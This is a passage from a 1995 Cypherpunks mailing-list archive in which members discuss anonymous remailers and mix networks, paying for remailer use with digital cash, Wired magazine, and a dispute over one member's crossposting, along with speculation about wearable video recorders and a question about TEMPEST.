pages. Or is there osmethign else that makes upa "intelligent agent" > One more thing that's marginally related to cypherpunks (hey I really > like this book so I'll take any chance I can to talk about it ;-) is > the idea that the efficiency of distributed computation (and distributed > intelligence) depends on high bandwidth and low latency of the communication > medium. Since anonymity seems to have rather high costs in terms of > bandwidth and latency (compare anonymous e-mail with internet video > conferencing or even with normal e-mail), this implies that > an organization of anonymous agents will not work as efficiently as > a similar orginzation whose members are not concerned about > anonymity. i disagree storngly. anonimity with almost no increase in latency or decrease in bandwidth is easily viable. Especially if it was a group of coleagues planning to get together, I mean the remailers and stuff are a different thing altogehter, but ytalk or another confrencing system with untracable features is no problem, hell just a conference call dialing up from payphones, ora favorite hacker trick of running a conference of a COCOT. etc.... i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From nelson at crynwr.com Fri Jan 6 20:03:52 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 6 Jan 95 20:03:52 PST Subject: Can someone verify this conjecture for me? Message-ID: I'd like to make sure I understand how a digital mix works. I've read Chaum's paper on it, but hey, there's a reason why I don't have a Phd in spite of having all the coursework done. It seems like it solves two separate problems: 1) foiling traffic analysis, and 2) foiling a cheater remailer. The problems are separate, really, because if you really, really trust the remailer (as many people do Julf), then 2) isn't a problem. All you need to do is solve 1. Or, you can solve 1) by using a single remailer. A necessary but not sufficient step to foil traffic analysis is to strip headers. If you trust any one remailer, then you needn't bother using any other ones (assuming that remailer has enough traffic, delay, mixing, etc to foil traffic analysis). There's no real difference between using a set (N>1) of trusted remailers and using only one, because you can consider the set of remailers to be a single remailer from the point of view of traffic analysis. But to be sure, at least one of your remailers MUST attempt to foil traffic analysis, otherwise you're effectively mistrusting the remailer operators but trusting the NSA (or FBI). As I said a month or two ago, you MUST assume that the spooks are watching all the remailers. It's cheap and easy, therefore it's being done. Sorry for the Crypto 101, but I figure that there are other people out there who don't understand it. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From pcassidy at world.std.com Fri Jan 6 20:11:53 1995 From: pcassidy at world.std.com (Peter F Cassidy) Date: Fri, 6 Jan 95 20:11:53 PST Subject: Peter D. Lewis In-Reply-To: <199501070053.TAA00768@bb.hks.net> Message-ID: wired has balls. the economist has to figure out what all this stuff means in the real world. wired just sells ads around the events it covers. lewis is innocent compared to wanton scum like kelly. From jrochkin at cs.oberlin.edu Fri Jan 6 20:13:43 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 20:13:43 PST Subject: Carol Anne Whoever Message-ID: I don't care very much about Carol Anne whoever. I don't care very much about her plight. I have received just enough information about her plight (via this list, oddly enough), to know that I don't have enough information to tell who I agree with in this dispute. I don't particularly want to get enough information to do that, because I don't care. If I did care, I would get the information through some other method then this list, because it seems completely inappropriate. The merits of netcom vs. smaller services seem irrelevant to this list, too, in my mind, and I don't care to see those either. If you were wondering. I also don't care to see 10 or 20 posts a day by Carol Anne Whoever which are resposes to random crypto-related posts wherein the whole post is quoted, and then Carol Anne adds "me too!", or "Does that remind you of a certain sysadmin? giggle, giggle.", or "Good point!" I am at a loss as to why Carol Anne thinks the details of her life, and her inane "me too"s are of interest to the cypherpunks list. I guess we can't stop Carol Anne from sending this stuff to the list anyways (but I can killfile her), but it would be nice if people would stop responding to her stuff. Obviously if you really feel it's an appropriate use of the list to do so anyway, I can't stop you. I'm just asking you to for purely selfish reasons, so I don't feel the need to killfile people who make otherwise intelligent posts, and miss those posts. [I'm beginning to suspect that Carol Anne, and her sysadmin too, are just tentacles of Detweiler.] From schirado at lab.cc.wmich.edu Fri Jan 6 20:26:33 1995 From: schirado at lab.cc.wmich.edu (No Taxes through No Government) Date: Fri, 6 Jan 95 20:26:33 PST Subject: Outlawing Anonymity Message-ID: <199501070427.XAA02486@grog.lab.cc.wmich.edu> TC May writes: >I see no prospect whatsover that a ban on anonymous mail could be >implemented, enforced, or upheld in the courts. Never say never. Even coming from Tim, this surprises me just a little. Never think that government won't do something. The effectiveness of their 'solution' may be minimal, but billions can be wasted, and countless lives ruined, before it can be stopped (or more likely, dammed; once government achieves power, it is loath to relinquish it without a death struggle). Some nation's groups of 'leader'-thugs may be in a better position than others to go for such a power grab at this moment in time. But any and all of them should be constantly scrutinized for the inevitable slide down that slippery slope. The "article" by our pal Martha which the SF Chronicle had the poor judgment and atrociously swollen cojones to publish, is one of the most dramatically explicit warning signs of the year so far... and NOT because the year is yet so young. And to think, Tim used to be the pessimist on this list, saved only by the reassurances of Duncan and Sandy... :-S From blane at seanet.com Fri Jan 6 20:26:55 1995 From: blane at seanet.com (Brian Lane) Date: Fri, 6 Jan 95 20:26:55 PST Subject: Too Much! Message-ID: Yet again I have un-subbed from the list because of the S/N ratio. And things were looking so good there for a while. Advice to Carol Ann: Take your crusade to e-mail. Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From eric at remailer.net Fri Jan 6 20:28:32 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 6 Jan 95 20:28:32 PST Subject: for-pay remailers and FV In-Reply-To: Message-ID: <199501070428.UAA21189@largo.remailer.net> From: "James A. Donald" On Fri, 6 Jan 1995, Eric Hughes wrote: > This whole fracas between blind-sig money and FV money is a symptom of > the confusion between clearing and settlement. It is nothing to do with that confusion. Keep your day job. > To wit, a remailer consortium would do best to issue a local banknote > usable only by themselves and have customers settle with the > consortium issuer, rather than any member of the consortium itself. > If the consortium issuer were to use blind sigs, the consortium > members wouldn't be able to ascertain who paid. Get it? The first sentence refers to a "local banknote". The second sentence refers to a particular way of issuing that banknote. Passage from the general to the specific. The problem that we are discussing is how to solve them without using Chaumian money. Think about how a local clearing organization allows this. Eric From hfinney at shell.portal.com Fri Jan 6 20:32:28 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 6 Jan 95 20:32:28 PST Subject: Can someone verify this conjecture for me? Message-ID: <199501070433.UAA16429@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: nelson at crynwr.com (Russell Nelson) > > I'd like to make sure I understand how a digital mix works. I've read > Chaum's paper on it, but hey, there's a reason why I don't have a Phd > in spite of having all the coursework done. > > It seems like it solves two separate problems: 1) foiling traffic > analysis, and 2) foiling a cheater remailer. The problems are > separate, really, because if you really, really trust the remailer (as > many people do Julf), then 2) isn't a problem. All you need to do is > solve 1. Or, you can solve 1) by using a single remailer. A > necessary but not sufficient step to foil traffic analysis is to strip > headers. My take on the paper is that he first presents the "mix", or remailer, as a method of foiling traffic analysis. Then he extends this to the "cascade", or chain of remailers, which does not improve traffic analysis resistence but as you say provides some immunity against a bad operator. > If you trust any one remailer, then you needn't bother using any other > ones (assuming that remailer has enough traffic, delay, mixing, etc to > foil traffic analysis). There's no real difference between using a > set (N>1) of trusted remailers and using only one, because you can > consider the set of remailers to be a single remailer from the point > of view of traffic analysis. There are other differences which may be relevant in practice. One is bandwidth. With a Chaumian cascade of N remailers you get N times the bandwidth used, as well as increased latency through the remailer network. One thing that is not often appreciated in Chaum's paper is that at least in his first description of the cascade, the assumption is that all users use the same sequence of remailers in the same order. We OTOH usually assume a different model, where the different possible paths are chosen with some distribution and randomness. I posted an analysis of some of the impacts of this difference a few months ago. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLw4ZXhnMLJtOy9MBAQGjtwIA7tlEMnKPqUAVqAMSmK6EE6eaOlzhqeLL hsHXhNJajyZQjF6osybGSYJ00UBhRkbAxUOtjY4MNf6oMrb9fKRxGg== =A3oZ -----END PGP SIGNATURE----- From eric at remailer.net Fri Jan 6 20:33:00 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 6 Jan 95 20:33:00 PST Subject: A Fire Upon the Deep In-Reply-To: Message-ID: <199501070432.UAA21211@largo.remailer.net> From: Wei Dai This is quite sensible given that in the Zone universe, you may have no idea how much computing power your enemies have, so no cryptography that is only computationally secure can really be trusted. I asked Vernor about this one a few months ago. He got lucky on this one. He thought that some advances in theory might render the whole idea ridiculous. It was not the case that he was considering relative computational power, which works much better in context, especially given the hints of some computational power beyond Turing machines. A great one-liner about debating public-key, in any case. Eric From nesta at nesta.pr.mcs.net Fri Jan 6 20:38:48 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 6 Jan 95 20:38:48 PST Subject: procnail Message-ID: in response to the recent barrage of nonsensical bullshit here, I was wondering if anyone knew the archive site or procmail, the mail filtering program? I think this is a good time to school everyone in the basics of Killfiles. I have never wanted to killfile a person before, this is a big step for me. 8) i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From root at einstein.ssz.com Fri Jan 6 20:41:56 1995 From: root at einstein.ssz.com (root) Date: Fri, 6 Jan 95 20:41:56 PST Subject: Remailers, Linux, & Help ... Message-ID: <199501070337.VAA00697@einstein.ssz.com> Hi all, Normaly I use(d) 'ravage at bga.com' to access this list but the times they are a changin' ... I have successfuly gotten my network at home on Internet via a ISDN link. We are interested in setting up a remailer which among other things supports anonymity. If anybody has experience or learned input on doing this under Linux please contact me. A reminder that RoboFest 6 in Austin, TX will occur this year on April 1 & 2. If there are any c-punks interested in giving a talk or doing demo's then please contact me. If any of you folks are in the area then stop by and say Hi. I will be working at the Wired Society booth. Take care! From nissim at acs.bu.edu Fri Jan 6 20:48:25 1995 From: nissim at acs.bu.edu (nissim at acs.bu.edu) Date: Fri, 6 Jan 95 20:48:25 PST Subject: Peter D. Lewis Message-ID: <199501070438.XAA101470@acs.bu.edu> I'm unfamiliar with what it is people have against Kevin Kelly. Why "wanton scum"? people might want to send mail not cc:ed to cypherpunks to keep the list from experiencing too much of a burden here. -A From tcmay at netcom.com Fri Jan 6 20:48:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 6 Jan 95 20:48:40 PST Subject: Peter D. Lewis In-Reply-To: Message-ID: <199501070448.UAA05731@netcom5.netcom.com> Peter F Cassidy wrote: > > wired has balls. the economist has to figure out what all this stuff > means in the real world. wired just sells ads around the events it > covers. lewis is innocent compared to wanton scum like kelly. Maybe I'm biased, but I have a lot of respect for Kevin Kelly. I met him at the first "Artificial Life" conference, at Los Alamos, 1987, and he drove down here to Santa Cruz to interview me for several hours for his not-yet-published "Wired." (As it turned out, Steven Levy also interviewed some of us and Kelly chose to run Levy's article in the #2 isuusue of "Wired," instead of his own, and submitted his own article to "Whole Earth Review," where it ran in the Summer 1993 issue. I've found Kelly to be somewhat quiet, and deep, and not all flamboyant and grubbing after soundbite quotes. His book "Out of Control," 1994, is the beast summary I've seen of the swirl of concepts we are generally interested in. So, what's your problem with Kelly? If it's the profit motive of "Wired," we disagree, as I think profits are great. If it's the ad-laden pages of "Wired," well, that's life in the high-tech age of cheap color printing, zillions of Macintoshes, and a culture that loves high-tech glitz. I think Kelly is a person of high integrity. It's hard to demand much more than this. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Fri Jan 6 20:50:56 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 6 Jan 95 20:50:56 PST Subject: procnail In-Reply-To: Message-ID: <199501070450.UAA21282@largo.remailer.net> ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail Eric From grendel at netaxs.com Fri Jan 6 21:13:17 1995 From: grendel at netaxs.com (Michael Handler) Date: Fri, 6 Jan 95 21:13:17 PST Subject: Netcom is not a good example (Was: Re: Files and mail) In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com> Message-ID: On Fri, 6 Jan 1995, Mike Duvos wrote: [ big monolithic service providers like Nyetcom are the best and will crush all you piddly little upstart ISPs ] > Big service providers like Netcom don't interfere with customer > use of the resources they sell, except when network functionality > is impacted. Even in such cases, they try to reach an > understanding with the user, and terminate accounts only as a > last resort. Accounts don't vanish when "the guy who owns the > machine" decides to throw a tantrum. Yeah. They only kill accounts when people criticize NetCruiser. :-P Nyetcom is hardly an example of a quality service provider. They suffer periodic long term news and email delays; their service personnel are rude, slow, and unprofessional (read: Bruce Woodcock & the above incident); their security has been compromised countless times; their FTP server is constantly overloaded; their toy software NetCruiser generates nonconformant Usenet articles; their 18 (!) machines are constantly overloaded that it takes a good five minutes to respond to a finger request; they have no http:// support. They are home to some of the most infamous net.kooks and net.cretins (like Tom Servo, currently), and their net.reputation sucks. Frankly, I'd rather have a Winternet account than a Netcom account. ObCypherpunks: sameer's system, the Community Connexion, suffers *none* of these problems. http://www.c2.org or for more information. sameer supports PGP and the running of anonymous remailers on his system. Check it out, send him money. From cactus at hks.net Fri Jan 6 21:52:52 1995 From: cactus at hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 21:52:52 PST Subject: Peter D. Lewis Message-ID: <199501070558.AAA04212@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Tim sez: > I think Kelly is a person of high integrity. It's hard to demand much > more than this. I simply can't think much of a magazine that has cover stories deriving entirely from kiddie-kracker squabbles. Kelly may have plenty of integrity but that's not the word that the magazine "Wired" usually brings to mind. It's not the profit motive or the ads that get me: running a business, I know you can't be picky about who you take money from. It's the lack of meaningful content that annoys me. As with Lewis, frequenly when they're discussing something I know something about their stories are fraught with inaccuracies and rumours. My personal favorite is when they list reporters among the "experts" on their technology-watch light bites. Their entire approach is to cast Like "Seventeen," "Wired" should prepend "don't you wish you were" to its title. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4tbioZzwIn1bdtAQEM7gF9EZE2qciEPOqQTYjwiqDF9vakwzSS3DSh ZJy1S0gTP7kNSTDnm/8UuoVOxehFhJ+X =g0sd -----END PGP SIGNATURE----- From doumakes at netcom.com Fri Jan 6 21:55:59 1995 From: doumakes at netcom.com (Don Doumakes) Date: Fri, 6 Jan 95 21:55:59 PST Subject: Remailer Abuse Message-ID: <199501070554.VAA14679@netcom9.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- > One thing to keep in mind, though, is that it's really the _last_ remailer > in the chain that's taking the most heat, and it would be nice if they got > payed. There's also an issue of some remailers refusing to be last in the > chain, so they dont' expose themselves so much. I agree, this is an important issue. But I think it's a separate one from the question of how users pay for the service. In other words, once there's a consensus to have a Guild of for-pay remailers, all the users should have to do is pay the Guild once. The Guild can then haggle over how to divvy up the money. Hard jobs, such as posting anon news, should command more money. On the issue of the medium of exchange, I favor blinded digital cash with its absolute anonymity. The "remailer in a box" that we spoke of earlier would do well to include this capability. - -- ______________________________________________________________________ Don Doumakes Finger doumakes at netcom.com for PGP public key Foxpro databases built to your specifications. Email me for details. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLw3RTBtumcu2AjihAQF+DQQAmhQxuMl4C6VzZLD+mHF5i0OAjLUZAhV+ eNOi4F6bUBsDyfm7TmxxWMsiJRlJFrKhIMT+A16lmBZPdQ/pnZjQSk2keLyXgs0N phsPmZsTWGZMOyWGH+Hh2ggBc5syhmZxuTWwHFqqbAKTVoYRC4esxW8g/lTKot7F drI0amkbq20= =pHqY -----END PGP SIGNATURE----- From mpd at netcom.com Fri Jan 6 21:57:33 1995 From: mpd at netcom.com (Mike Duvos) Date: Fri, 6 Jan 95 21:57:33 PST Subject: Netcom is not a good example (Was: Re: Files and mail) In-Reply-To: Message-ID: <199501070557.VAA12227@netcom18.netcom.com> Michael Handler writes: > Yeah. They only kill accounts when people criticize > NetCruiser. :-P > Netcom is hardly an example of a quality service provider. > They suffer periodic long term news and email delays; their > service personnel are rude, slow, and unprofessional (read: > Bruce Woodcock & the above incident); NetCruiser is a "work in progress" and continues to evolve in the right direction. Bruce Sterling Woodcock is history. On the rare occasions when I have interacted with support at netcom.com, their responses have been both helpful and provided in a timely fashion. > Their security has been compromised countless times This is Unix. Not a problem exclusive to Netcom. > They are home to some of the most infamous net.kooks and > net.cretins (like Tom Servo, currently), ... I suppose I should be pleased that you have not included me by name in the list. :) > Frankly, I'd rather have a Winternet account than a Netcom > account. Fine with me. As long as *I* don't have to have a Winternet account. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From cactus at seabsd.hks.net Fri Jan 6 22:02:08 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 22:02:08 PST Subject: Files and mail Message-ID: <199501070607.BAA04310@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Anybody want to offer odds on whether or not this merry little exchange will be reported in Wired as news? - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit dA1go4Jiaag= =eQPF - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA =g1Bd -----END PGP SIGNATURE----- From cactus at hks.net Fri Jan 6 22:10:57 1995 From: cactus at hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 22:10:57 PST Subject: Too Much! Message-ID: <199501070616.BAA04394@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article you write: > Yet again I have un-subbed from the list because of the S/N ratio. And >things were looking so good there for a while. You might want to try reading it from NNTP, via c2.org or hks.net. You can then use Kill files. Wonderful beasts, those. (And if more people do this, we could actually try to use some distributed mechanisms such as that that strn uses.) - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw32/xNhgovrPB7dAQEUBwQAhWOYKkqwHGyi2eFfnYt+8LsFU+Af3Lsl sT1VDjICu1XIAhswVfKL+h7Dn9r1pmeNHtJFF0V8S/fKGVOU5dhv+gZZwVOTjbnL a2g+MTZkh/vonVy5PLDELrpeRlcVdxR+abcg9AWahjYCFlua8NR5GjiN6iKeC1C8 o3F377//PSU= =rxxD - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw4xuCoZzwIn1bdtAQHTNgF/T9OR6yUCu05KZW4s3MSHptRoclc31xO8 5O0jAXDA0c9oE/39smLZ++I6OoGh7Wiq =5/FC -----END PGP SIGNATURE----- From erc at s116.slcslip.indirect.com Fri Jan 6 22:26:18 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Fri, 6 Jan 95 22:26:18 PST Subject: Files and mail In-Reply-To: <199501070607.BAA04310@bb.hks.net> Message-ID: > Anybody want to offer odds on whether or not this merry little exchange > will be reported in Wired as news? No bet. ;) The computer press is pretty imature, they'll report almost anything. Personally, I think both Carol Anne Braddock and Mike Horwath BOTH need to grow up, along wih a substantial number of the snipers and slammers and back-seat-driver commentators regarding this thread. Maybe they ought to restrict net access by age? 25 or so oughta be a good age ... anyone younger is barred from access, or unless they provide evidence that they have a maturity level greater than that of your average six-year-old. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From jcorgan at scruznet.com Fri Jan 6 22:28:11 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Fri, 6 Jan 95 22:28:11 PST Subject: Too Much! Message-ID: >You might want to try reading it from NNTP, via c2.org or hks.net. You >can then use Kill files. What is the group name? == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov From carolann at mm.com Fri Jan 6 23:18:51 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 23:18:51 PST Subject: Soapbox mode on!(but short) In-Reply-To: <9501062310.AB20311@eri.erinet.com> Message-ID: Dear Paul J. Ste. Marie, I was quietly going through my mail after an eight hour layoff. The first thing you do is lie. I have called you a liar. Point Blank! And for the honor of this very list, so that there is some credibility, I shall retrieve from a tin reader the actual posting, COMPLETE WITH HEADER. And what makes creeps like you going is the ability to continue, to spread those lies. [soapbox mode on] THE POSTING WENT UNANSWERED FOR 3 DAYS IN 10 NEWSGROUPS. UNANSWERED...NADA ...NO BYTES...NO BITS.....NO ANYTHING THE FIRST PERSON TO RESPOND WAS HORWATH, ISSUING SOME KIND OF REALLY LAME APOLOGY...TO WHOM NO ONE KNOWS, FOR NO ONE HAD RESPONDED....GET IT....CAN YOU HANDLE PLAIN ENGLISH? NO MR. STE. MARIE I WILL NOT START RUMOR OR CONTINUE RUMOR. YOU HAVE LIED TO THE FINE PEOPLE OF CYPHERPUNK LIST. YOU HAVE WASTED THEIR TIME AND THEIR BANDWITH (THEIR LIFE) FOR THE MOST IMPORTANT CODE YOU CAN EVER WRITE IS THE TRUTH. [soapbox mode off] Please pardon me now, while I retrieve the actual postings. Love Always, Carol Anne On Fri, 6 Jan 1995, Paul J. Ste. Marie wrote: > At 08:58 AM 1/6/95 +0000, Nesta Stubbs wrote: > >On Fri, 6 Jan 1995, Carol Anne Braddock wrote: > > ... > >> I "crossposted" it to my favorite 10 newsgroups. Just 10. > >> Some creep complained. (we'll get to him a bit later). > >> > >ten is not a large number when it comes o cross-posting on soem topics, I > >can think of at lezast tewenty newsgroups where the PRZ letters and such > >would make alot of sense and be on topic. This just goes to show the > >soemtimes reactionar steps people take to control spamming. ... > > The discussion on alt.current-events.net-abuse seemed to indicate that the > claim of "Just 10" above is a slight understandment. The newsgroups seem to > have been hit alphabetically, and I believe the total count was in the hundreds. > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com > > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From nissim at acs.bu.edu Fri Jan 6 23:55:20 1995 From: nissim at acs.bu.edu (nissim at acs.bu.edu) Date: Fri, 6 Jan 95 23:55:20 PST Subject: what to do about live video - all the time? Message-ID: <199501070745.CAA64839@acs.bu.edu> I've just invented a big hassle, and if I don't start the patent process someone else will. Picture a near future in which your shirt or walkman is a 360 degree video camera sensing live video across visible and other spectra. Your shirt sends out a signal to your home computer, Your home computer archives your daily environment and activities for you. You have been sold this device on several premises. 1) crime reduction - no sane low level criminal would harass you; you have him, his biometrics, unique thermal signature etc. on video. Talk about neighborhood watch. 2) life/work productivity enhancement. What was said when? what could you have looked into today but slipped your mind? 3) warm fuzzies. Kodak style "your life in pictures." For now I'll assume the device actually works as claimed. It is affordably priced. Any normal person who has a car alarm, walkman, or laptop PC is apt to have one. You even get a small discount on your health insurance. Maybe your local taxes go down as your district votes to reduce the # of cops. For now, we assume that all the output of your video shirt is securely encrypted when it leaves the Vshirt. ISSUE 1: Who controls the data? Year 0: The devices are so rare the police don't think to ask people to supply their tapes if they witness a crime committed re: a third party. Year 3: The police subpeona Vshirts they know to be in the crime vicinity. Presumably they use their current abilities with cellphone companies to locate who's where when. Year 3.1 While reviewing Vshirt tapes police note that non-case related illegal activities are going on. Jaywalking. Speeding. Recreational drugs. Verbal assault. Life and property threatening felonies are also discovered. At this point the scene bifurcates wildly: Do the police say, "look, this is happening anyway, we need 24 hour video surveillance of everything - if nothing else to protect ourselves in court." Evidence: in the UK they video the motorways, and several public areas in the cities (soc.culture.british Jan '95) -for crime/security purposes. In the US, there are utility poles wired for sound. Design News had an item on this in their Yellow newsflash section in '93 I think. The utility poles were/are in washington DC, and supposedly only listen for gunshots. I'm pretty sure the poles could call the cops in using triangulated crime location data too. However slight the infraction, we are all lawbreakers. Do we have a right to 'not testify against ourselves" by refusing to decrypt? Can we buy (ugh.) an "attorney-client privlege" box that hold all of our data Keys in a legal fiction that the courts currently respect? Will the 5th fare any better than the 1st and second amendments? Will the state issue a "statute of limitations" on data-recorded crime, so that you can't be arrested for last year's public drunkenness? Will Vshirt makers make, or be allowed to make, devices that create -absolutely no residue- data keys? that way, if you want to protect yourself from what you happened last thursday you can set the keystrip on fire and nobody, not even you, has a hope of ever decrypting? Evidence: in the US Digital audio tape Mfrs. are required to put in some sort of copyguard. Also scanners w/image signature. In the US, reconstructed deleted files for legal purposes is considered legal evidence. There is a firm in Seattle that has even reconstructed harddisks written over with 0s for criminal (tax) cases. Citizens or their employers are required to keep and prepare documentation adequate to prepare a valid tax return. i.e., some records you _have_ to keep. and of course the digital telephony bill... What thoughtful Pro-freedom arguments can be constructed to deal with this device and its social fallout? What thoughtful software and hardware can be created? The device does not yet exist, but component parts can be assembled for less than $2000 and 17oz weight that do a fair job of mimicking it. Moore's "law" suggests that by 2000, these oughta be $19.99/month plus data charges. VoicePGP is a great jumping-off place...will there be a VideoPGP, or rather an optimized-for-videoPGP coming soon? If I've christened its existence now. I hereby declare the application of Public+private key cryptography as it especially applies to picture, live picture, and/or video transmission to be public domain. (Surely I'm not the first, but this can't hurt.) Write. Talk. Create. Protect yourselves. ObLameJoke: Well, as far as I know none of my relatives were killed by Stalin, or Mao, or interned in WWII, or blacklisted, or even jailed. I suppose a few were drafted. I guess it's about time for the forces of authority to reach into my little corner of the gene pool and crush me too. I mean, I'm missing out! Treon Verdery, posting under the auspices of Adam Almog From carolann at mm.com Fri Jan 6 23:59:11 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 23:59:11 PST Subject: From me to me to you...The Actual Article Message-ID: Dear All of You, This is the article, and what I did with it. It is complete in it's entireity, from the bang paths, to the crosspostings. Please study them carefully, for my next post will contain the first response to the article, three days later. ALL DURING THIS TIME, I WAS LED TO BELIEVE, THROUGH PHONE CALLS THAT THIS WAS "GOING TO BE INVESTIGATED SOON". NOTHING OF THE SORT HAPPENED. NO ONE IN ANY OF THE TEN GROUPS RAISED A SINGLE OBJECTION. PERIOD. I believe in your capacity to fairly judge. My response to the first complaint lies still censored in my mail reader. For if .1% of all the Usenet is inappropriate to post to, when will it become just .01% ? Now, the article, From carolann at mm.com Sat Jan 7 00:15:04 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 00:15:04 PST Subject: The first reply came 3 days later. Message-ID: These groups are important to me. It is why I posted them there. I use PGP extensively in my usenet postings, and I am not the only one in those groups that posts with PGP. Yes, suffice to say, I endorse this letter. I dream of a day when we do not have to deal with this issue, yet it is something that affects any one who uses the program. All that was really asked was not to go to the meeting with the D.A., and make a protest. MOST CYPHERPUNKS I KNOW OF COULDN'T HAVE MADE IT ANYWAY, THIS TIME, BECAUSE THE STAKES IN THE REMAILER GAME ARE HIGH, AND WITHIN A MONTH OR TWO, THERE WILL BE SYSTEM SO THAT WE CAN GET SOME MONEY TO EAT WITH AND BUY EQUIPMENT. But on the user level, I do my best to TEACH GOOD FUNDAMENTAL COMPUTER SAFETY. Rumors are no good for this. There was PRZ's letter to us, and Dubois's letter to alt.security pgp. Those are facts. Those I can teach with, and so can even a one month PGP Cypherpunk Novice. So can you. Now, the first reply, From Derek.Zeanah at f903.n102.z1.fidonet.org Sat Jan 7 00:52:00 1995 From: Derek.Zeanah at f903.n102.z1.fidonet.org (Derek Zeanah) Date: Sat, 7 Jan 95 00:52:00 PST Subject: TEMPEST Questions... Message-ID: <121_9501062145@borderlin.quake.com> -----BEGIN PGP SIGNED MESSAGE----- I'm writing an article on TEMPEST technology. The focus is on what TEMPEST is and how to defeat it, if possible. So far I've gotten some insightful information, but I'm looking for all I can get. Has anyone ever heard of TEMPEST being used in the continental US? Can anyone tell me what measures offer some level of protection, or steps that can be taken to reduce the likelihood of being successfully targeted? Has anyone ever seen TEMPEST in action? Any and all information will be greatly appreciated. I prefer responses via e-mail to dzeanah at holonet, but I also read this newsgroup pretty frequently. Thanks a lot. - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAi34pIYAAAEEALUNlIECc/SWho25DYEMwSAB0pEZsVro086ocA1eFmqfPUdb 